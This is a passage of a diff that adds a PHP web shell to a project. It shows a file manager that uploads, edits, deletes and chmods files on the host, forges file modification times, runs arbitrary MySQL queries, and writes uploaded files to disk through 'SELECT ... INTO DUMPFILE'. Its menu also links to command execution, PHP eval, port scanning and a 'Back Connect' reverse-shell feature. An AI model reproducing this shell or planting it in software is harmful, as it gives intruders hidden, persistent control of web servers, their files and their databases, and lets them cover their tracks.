+        $('filelist').submit();
+}
+function createfile(nowpath){
+        var filename;
+        filename = prompt('Please input the file name:', '');
+        if (!filename) return;
+        opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+        $('fileopform').action.value=action;
+        $('fileopform').opfile.value=opfile;
+        $('fileopform').dir.value=dir;
+        $('fileopform').submit();
+}
+function godir(dir,view_writable){
+        if (view_writable) {
+                $('godir').view_writable.value=view_writable;
+        }
+        $('godir').dir.value=dir;
+        $('godir').submit();
+}
+function getsize(getdir,dir){
+        $('getsize').getdir.value=getdir;
+        $('getsize').dir.value=dir;
+        $('getsize').submit();
+}
+function editrecord(action, base64, tablename){
+        if (action == 'del') {          
+                if (!confirm('Is or isn\'t deletion record?')) return;
+        }
+        $('recordlist').doing.value=action;
+        $('recordlist').base64.value=base64;
+        $('recordlist').tablename.value=tablename;
+        $('recordlist').submit();
+}
+function moddbname(dbname) {
+        if(!dbname) return;
+        $('setdbname').dbname.value=dbname;
+        $('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+        if(!tablename) return;
+        if (doing) {
+                $('settable').doing.value=doing;
+        }
+        if (page) {
+                $('settable').page.value=page;
+        }
+        $('settable').tablename.value=tablename;
+        $('settable').submit();
+}
+function s(action,nowpath,p1,p2,p3,p4,p5) {
+        if(action) $('opform').action.value=action;
+        if(nowpath) $('opform').nowpath.value=nowpath;
+        if(p1) $('opform').p1.value=p1;
+        if(p2) $('opform').p2.value=p2;
+        if(p3) $('opform').p3.value=p3;
+        if(p4) $('opform').p4.value=p4;
+        if(p5) $('opform').p4.value=p5;
+}
+function g(action,nowpath,p1,p2,p3,p4,p5) {
+        if(!action) return;
+        s(action,nowpath,p1,p2,p3,p4,p5);
+        $('opform').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<?php
+formhead(array('name'=>'opform'));
+makehide('action', $action);
+makehide('nowpath', $nowpath);
+makehide('p1', $p1);
+makehide('p2', $p2);
+makehide('p3', $p3);
+makehide('p4', $p4);
+makehide('p5', $p5);
+formfoot();
+
+if(!function_exists('posix_getegid')) {
+        $user = @get_current_user();
+        $uid = @getmyuid();
+        $gid = @getmygid();
+        $group = "?";
+} else {
+        $uid = @posix_getpwuid(@posix_geteuid());
+        $gid = @posix_getgrgid(@posix_getegid());
+        $user = $uid['name'];
+        $uid = $uid['uid'];
+        $group = $gid['name'];
+        $gid = $gid['gid'];
+}
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+        <tr class="head">
+                <td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+        </tr>
+        <tr class="alt1">
+                <td>
+                        <span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
+                        <a href="javascript:g('logout');">Logout</a> | 
+                        <a href="javascript:g('file');">File Manager</a> | 
+                        <a href="javascript:g('mysqladmin');">MYSQL Manager</a> | 
+                        <a href="javascript:g('sqlfile');">MySQL Upload &amp; Download</a> | 
+                        <a href="javascript:g('shell');">Execute Command</a> | 
+                        <a href="javascript:g('phpenv');">PHP Variable</a> | 
+                        <a href="javascript:g('portscan');">Port Scan</a> | 
+                        <a href="javascript:g('secinfo');">Security information</a> | 
+                        <a href="javascript:g('eval');">Eval PHP Code</a>
+                        <?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
+                </td>
+        </tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+$errmsg && m($errmsg);
+
+// »ñÈ¡µ±Ç°Â·¾¶
+if (!$dir) {
+        $dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
+}
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+        $dir = $dir.'/';
+}
+
+if ($action == 'file') {
+
+        // Åж϶ÁдÇé¿ö
+        $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+        // ´´½¨Ä¿Â¼
+        if ($newdirname) {
+                $mkdirs = $nowpath.$newdirname;
+                if (file_exists($mkdirs)) {
+                        m('Directory has already existed');
+                } else {
+                        m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+                        @chmod($mkdirs,0777);
+                }
+        }
+
+        // ÉÏ´«Îļþ
+        elseif ($doupfile) {
+                m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+        }
+
+        // ±à¼­Îļþ
+        elseif ($editfilename && $filecontent) {
+                $fp = @fopen($editfilename,'w');
+                m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+                @fclose($fp);
+        }
+
+        // ±à¼­ÎļþÊôÐÔ
+        elseif ($pfile && $newperm) {
+                if (!file_exists($pfile)) {
+                        m('The original file does not exist');
+                } else {
+                        $newperm = base_convert($newperm,8,10);
+                        m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+                }
+        }
+
+        // ¸ÄÃû
+        elseif ($oldname && $newfilename) {
+                $nname = $nowpath.$newfilename;
+                if (file_exists($nname) || !file_exists($oldname)) {
+                        m($nname.' has already existed or original file does not exist');
+                } else {
+                        m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+                }
+        }
+
+        // ¸´ÖÆÎļþ
+        elseif ($sname && $tofile) {
+                if (file_exists($tofile) || !file_exists($sname)) {
+                        m('The goal file has already existed or original file does not exist');
+                } else {
+                        m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+                }
+        }
+
+        // ¿Ë¡ʱ¼ä
+        elseif ($curfile && $tarfile) {
+                if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+                        m('The goal file has already existed or original file does not exist');
+                } else {
+                        $time = @filemtime($tarfile);
+                        m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+                }
+        }
+
+        // ×Ô¶¨Òåʱ¼ä
+        elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+                if (!@file_exists($curfile)) {
+                        m(basename($curfile).' does not exist');
+                } else {
+                        $time = strtotime("$year-$month-$day $hour:$minute:$second");
+                        m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+                }
+        }
+
+        // ÅúÁ¿É¾³ýÎļþ
+        elseif($doing == 'delfiles') {
+                if ($dl) {
+                        $dfiles='';
+                        $succ = $fail = 0;
+                        foreach ($dl as $filepath) {
+                                if (is_dir($filepath)) {
+                                        if (@deltree($filepath)) {
+                                                $succ++;
+                                        } else {
+                                                $fail++;
+                                        }
+                                } else {
+                                        if (@unlink($filepath)) {
+                                                $succ++;
+                                        } else {
+                                                $fail++;
+                                        }
+                                }
+                        }
+                        m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
+                } else {
+                        m('Please select folder/file(s)');
+                }
+        }
+
+        //²Ù×÷Íê±Ï
+        formhead(array('name'=>'createdir'));
+        makehide('newdirname');
+        makehide('dir',$nowpath);
+        formfoot();
+        formhead(array('name'=>'fileperm'));
+        makehide('newperm');
+        makehide('pfile');
+        makehide('dir',$nowpath);
+        formfoot();
+        formhead(array('name'=>'copyfile'));
+        makehide('sname');
+        makehide('tofile');
+        makehide('dir',$nowpath);
+        formfoot();
+        formhead(array('name'=>'rename'));
+        makehide('oldname');
+        makehide('newfilename');
+        makehide('dir',$nowpath);
+        formfoot();
+        formhead(array('name'=>'fileopform', 'target'=>'_blank'));
+        makehide('action');
+        makehide('opfile');
+        makehide('dir');
+        formfoot();
+        formhead(array('name'=>'getsize'));
+        makehide('getdir');
+        makehide('dir');
+        formfoot();
+
+        $free = @disk_free_space($nowpath);
+        !$free && $free = 0;
+        $all = @disk_total_space($nowpath);
+        !$all && $all = 0;
+        $used = $all-$free;
+        p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
+
+        $cwd_links = '';
+        $path = explode('/', $nowpath);
+        $n=count($path);
+        for($i=0;$i<$n-1;$i++) {
+                $cwd_links .= '<a href="javascript:godir(\'';
+                for($j=0;$j<=$i;$j++) {
+                        $cwd_links .= $path[$j].'/';
+                }
+                $cwd_links .= '\');">'.$path[$i].'/</a>';
+        }
+
+?>
+<script type="text/javascript">
+document.onclick = shownav;
+function shownav(e){
+        var src = e?e.target:event.srcElement;
+        do{
+                if(src.id =="jumpto") {
+                        $('inputnav').style.display = "";
+                        $('pathnav').style.display = "none";
+                        //hidenav();
+                        return;
+                }
+                if(src.id =="inputnav") {
+                        return;
+                }
+                src = src.parentNode;
+        }while(src.parentNode)
+
+        $('inputnav').style.display = "none";
+        $('pathnav').style.display = "";
+}
+</script>
+<div style="background:#eee;margin-bottom:10px;">
+        <table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
+                <tr>
+                        <td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
+                        <td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
+                </tr>
+        </table>
+        <table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
+        <form action="" method="post" id="godir" name="godir">
+                <tr>
+                        <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+                        <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
+                        <td nowrap><input class="bt" value="GO" type="submit"></td>
+                </tr>
+        </form>
+        </table>
+<?php
+        if (IS_WIN && IS_COM) {
+                $obj = new COM('scripting.filesystemobject');
+                if ($obj && is_object($obj) && $obj->Drives) {
+                        echo '<div class="drives">';
+                        $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+                        $comma = '';
+                        foreach($obj->Drives as $drive) {
+                                if ($drive->Path) {
+                                        p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+                                        $comma = '<span>|</span>';
+                                }
+                        }
+                        echo '</div>';
+                }
+        }
+?>
+</div>
+<?php
+        $findstr = $_POST['findstr'];
+        $re = $_POST['re'];
+        tbhead();
+        p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
+        p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
+        p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+        p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
+        p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+        p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
+        p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
+        p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+
+        p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
+
+        p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+        //²é¿´ËùÓпÉдÎļþºÍĿ¼
+        $dirdata=array();
+        $filedata=array();
+
+        if ($view_writable == 'dir') {
+                $dirdata = GetWDirList($nowpath);
+                $filedata = array();
+        } elseif ($view_writable == 'file') {
+                $dirdata = array();
+                $filedata = GetWFileList($nowpath);
+        } elseif ($findstr) {
+                $dirdata = array();
+                $filedata = GetSFileList($nowpath, $findstr, $re);
+        } else {
+                // Ŀ¼Áбí
+                //scandir()ЧÂʸü¸ß
+                $dirs=@opendir($dir);
+                while ($file=@readdir($dirs)) {
+                        $filepath=$nowpath.$file;
+                        if(@is_dir($filepath)){
+                                $dirdb['filename']=$file;
+                                $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+                                $dirdb['dirchmod']=getChmod($filepath);
+                                $dirdb['dirperm']=getPerms($filepath);
+                                $dirdb['fileowner']=getUser($filepath);
+                                $dirdb['dirlink']=$nowpath;
+                                $dirdb['server_link']=$filepath;
+                                $dirdata[]=$dirdb;
+                        } else {                
+                                $filedb['filename']=$file;
+                                $filedb['size']=sizecount(@filesize($filepath));
+                                $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+                                $filedb['filechmod']=getChmod($filepath);
+                                $filedb['fileperm']=getPerms($filepath);
+                                $filedb['fileowner']=getUser($filepath);
+                                $filedb['dirlink']=$nowpath;
+                                $filedb['server_link']=$filepath;
+                                $filedata[]=$filedb;
+                        }
+                }// while
+                unset($dirdb);
+                unset($filedb);
+                @closedir($dirs);
+        }
+        @sort($dirdata);
+        @sort($filedata);
+        $dir_i = '0';
+
+        p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+        makehide('action','file');
+        makehide('thefile');
+        makehide('doing');
+        makehide('dir',$nowpath);
+
+        foreach($dirdata as $key => $dirdb){
+                if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+                        if($getdir && $getdir == $dirdb['server_link']) {
+                                $attachsize = dirsize($dirdb['server_link']);
+                                $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
+                        } else {
+                                $attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
+                        }
+                        $thisbg = bg();
+                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+                        p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
+                        p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+                        p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
+                        p('<td nowrap>'.$attachsize.'</td>');
+                        p('<td nowrap>');
+                        p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+                        p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+                        p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+                        p('</tr>');
+                        $dir_i++;
+                } else {
+                        if($dirdb['filename']=='..') {
+                                p('<tr class='.bg().'>');
+                                p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+                                p('</tr>');
+                        }
+                }
+        }
+
+        p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+        $file_i = '0';
+
+        foreach($filedata as $key => $filedb){
+                if($filedb['filename']!='..' && $filedb['filename']!='.') {
+                        $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
+                        $thisbg = bg();
+                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+                        p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
+                        p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
+                        p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
+                        p('<td nowrap>'.$filedb['size'].'</td>');
+                        p('<td nowrap>');
+                        p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+                        p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+                        p('<td nowrap>');
+                        p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+                        p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+                        p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+                        p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
+                        p('</td></tr>');
+                        $file_i++;
+                }
+        }
+        p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+        p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+        p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+        if($doing=="mysqlupload"){
+                $file = $_FILES['uploadfile'];
+                $filename = $file['tmp_name'];
+                if (file_exists($savepath)) {
+                        m('The goal file has already existed');
+                } else {
+                        if(!$filename) {
+                                m('Please choose a file');
+                        } else {
+                                $fp=@fopen($filename,'r');
+                                $contents=@fread($fp, filesize($filename));
+                                @fclose($fp);
+                                $contents = bin2hex($contents);
+                                if(!$upname) $upname = $file['name'];
+                                $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+                                $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+                                m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+                        }
+                }
+        }
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+        if(!doing) return;
+        $('doing').value=doing;
+        $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+        $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+        $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+        $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+        $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+        $('mysqlfile').charset.value=$('dbinfo').charset.value;
+        $('mysqlfile').submit();
+}
+</script>
+<?php
+        !$dbhost && $dbhost = 'localhost';
+        !$dbuser && $dbuser = 'root';
+        !$dbport && $dbport = '3306';
+        formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+        makehide('action','sqlfile');
+        p('<p>');
+        p('DBHost:');
+        makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+        p(':');
+        makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+        p('DBUser:');
+        makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+        p('DBPass:');
+        makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+        p('DBName:');
+        makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+        p('DBCharset:');
+        makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+        p('</p>');
+        formfoot();
+        p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+        p('<h2>Upload file</h2>');
+        p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+        p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+        p('<h2>Download file</h2>');
+        p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+        makehide('dbhost');
+        makehide('dbport');
+        makehide('dbuser');
+        makehide('dbpass');
+        makehide('dbname');
+        makehide('charset');
+        makehide('doing');
+        makehide('action','sqlfile');
+        p('</form>');
+}
+
+elseif ($action == 'mysqladmin') {
+        !$dbhost && $dbhost = 'localhost';
+        !$dbuser && $dbuser = 'root';
+        !$dbport && $dbport = '3306';
+        $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+        if(isset($dbhost)){
+                $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+        }
+        if(isset($dbuser)) {
+                $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+        }
+        if(isset($dbpass)) {
+                $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+        }
+        if(isset($dbport)) {
+                $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+        }
+        if(isset($dbname)) {
+                $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+        }
+        if(isset($charset)) {
+                $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+        }
+
+        if ($doing == 'backupmysql' && $saveasfile) {
+                if (!$table) {
+                        m('Please choose the table');
+                } else {
+                        $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+                        $fp = @fopen($path,'w');
+                        if ($fp) {
+                                foreach($table as $k => $v) {
+                                        if ($v) {
+                                                sqldumptable($v, $fp);
+                                        }
+                                }
+                                fclose($fp);                            
+                                $fileurl = str_replace(SA_ROOT,'',$path);
+                                m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+                                mysql_close();
+                        } else {
+                                m('Backup failed');
+                        }
+                }
+        }
+        if ($insert && $insertsql) {
+                $keystr = $valstr = $tmp = '';
+                foreach($insertsql as $key => $val) {
+                        if ($val) {
+                                $keystr .= $tmp.$key;
+                                $valstr .= $tmp."'".addslashes($val)."'";
+                                $tmp = ',';
+                        }
+                }
+                if ($keystr && $valstr) {
+                        $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+                        m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+                }
+        }
+        if ($update && $insertsql && $base64) {
+                $valstr = $tmp = '';
+                foreach($insertsql as $key => $val) {
+                        $valstr .= $tmp.$key."='".addslashes($val)."'";
+                        $tmp = ',';
+                }
+                if ($valstr) {
+                        $where = base64_decode($base64);
+                        $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+                        m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+                }
+        }
+        if ($doing == 'del' && $base64) {
+                $where = base64_decode($base64);
+                $delete_sql = "DELETE FROM $tablename WHERE $where";
+                $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+                m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+        }
+
+        if ($tablename && $doing == 'drop') {
+                $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+                if (q("DROP TABLE $tablename")) {
+                        m('Drop table of success');
+                        $tablename = '';
+                } else {
+                        m(mysql_error());
+                }
+        }
+
+        formhead(array('title'=>'MYSQL Manager'));
+        makehide('action','mysqladmin');
+        p('<p>');
+        p('DBHost:');
+        makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+        p(':');
+        makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+        p('DBUser:');
+        makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+        p('DBPass:');
+        makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+        p('DBCharset:');
+        makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+        makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+        p('</p>');
+        formfoot();
+
+        //²Ù×÷¼Ç¼
+        formhead(array('name'=>'recordlist'));
+        makehide('doing');
+        makehide('action','mysqladmin');
+        makehide('base64');
+        makehide('tablename');
+        p($dbform);
+        formfoot();
+
+        //Ñ¡¶¨Êý¾Ý¿â
+        formhead(array('name'=>'setdbname'));
+        makehide('action','mysqladmin');
+        p($dbform);
+        if (!$dbname) {
+                makehide('dbname');
+        }
+        formfoot();
+
+        //Ñ¡¶¨±í
+        formhead(array('name'=>'settable'));
+        makehide('action','mysqladmin');
+        p($dbform);
+        makehide('tablename');
+        makehide('page',$page);
+        makehide('doing');
+        formfoot();
+
+        $cachetables = array(); 
+        $pagenum = 30;
+        $page = intval($page);
+        if($page) {
+                $start_limit = ($page - 1) * $pagenum;
+        } else {
+                $start_limit = 0;
+                $page = 1;
+        }
+        if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+                $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+                //»ñÈ¡Êý¾Ý¿âÐÅÏ¢
+                $mysqlver = mysql_get_server_info();
+                p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+                $highver = $mysqlver > '4.1' ? 1 : 0;
+
+                //»ñÈ¡Êý¾Ý¿â
+                $query = q("SHOW DATABASES");
+                $dbs = array();
+                $dbs[] = '-- Select a database --';
+                while($db = mysql_fetch_array($query)) {
+                        $dbs[$db['Database']] = $db['Database'];
+                }
+                makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+                $tabledb = array();
+                if ($dbname) {
+                        p('<p>');
+                        p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+                        if ($tablename) {
+                                p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+                        }
+                        p('</p>');
+                        mysql_select_db($dbname);
+
+                        $getnumsql = '';
+                        $runquery = 0;
+                        if ($sql_query) {
+                                $runquery = 1;
+                        }
+                        $allowedit = 0;
+                        if ($tablename && !$sql_query) {
+                                $sql_query = "SELECT * FROM $tablename";
+                                $getnumsql = $sql_query;
+                                $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+                                $allowedit = 1;
+                        }
+                        p('<form action="'.$self.'" method="POST">');
+                        p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+                        makehide('tablename', $tablename);
+                        makehide('action','mysqladmin');
+                        p($dbform);
+                        p('</form>');
+                        if ($tablename || ($runquery && $sql_query)) {
+                                if ($doing == 'structure') {
+                                        $result = q("SHOW FULL COLUMNS FROM $tablename");
+                                        $rowdb = array();
+                                        while($row = mysql_fetch_array($result)) {
+                                                $rowdb[] = $row;
+                                        }
+                                        p('<h3>Structure</h3>');
+                                        p('<table border="0" cellpadding="3" cellspacing="0">');
+                                        p('<tr class="head">');
+                                        p('<td>Field</td>');
+                                        p('<td>Type</td>');
+                                        p('<td>Collation</td>');
+                                        p('<td>Null</td>');
+                                        p('<td>Key</td>');
+                                        p('<td>Default</td>');
+                                        p('<td>Extra</td>');
+                                        p('<td>Privileges</td>');
+                                        p('<td>Comment</td>');
+                                        p('</tr>');
+                                        foreach ($rowdb as $row) {
+                                                $thisbg = bg();
+                                                p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+                                                p('<td>'.$row['Field'].'</td>');
+                                                p('<td>'.$row['Type'].'</td>');
+                                                p('<td>'.$row['Collation'].'&nbsp;</td>');
+                                                p('<td>'.$row['Null'].'&nbsp;</td>');
+                                                p('<td>'.$row['Key'].'&nbsp;</td>');
+                                                p('<td>'.$row['Default'].'&nbsp;</td>');
+                                                p('<td>'.$row['Extra'].'&nbsp;</td>');
+                                                p('<td>'.$row['Privileges'].'&nbsp;</td>');
+                                                p('<td>'.$row['Comment'].'&nbsp;</td>');
+                                                p('</tr>');
+                                        }
+                                        tbfoot();
+                                        $result = q("SHOW INDEX FROM $tablename");
+                                        $rowdb = array();
+                                        while($row = mysql_fetch_array($result)) {
+                                                $rowdb[] = $row;
+                                        }
+                                        p('<h3>Indexes</h3>');
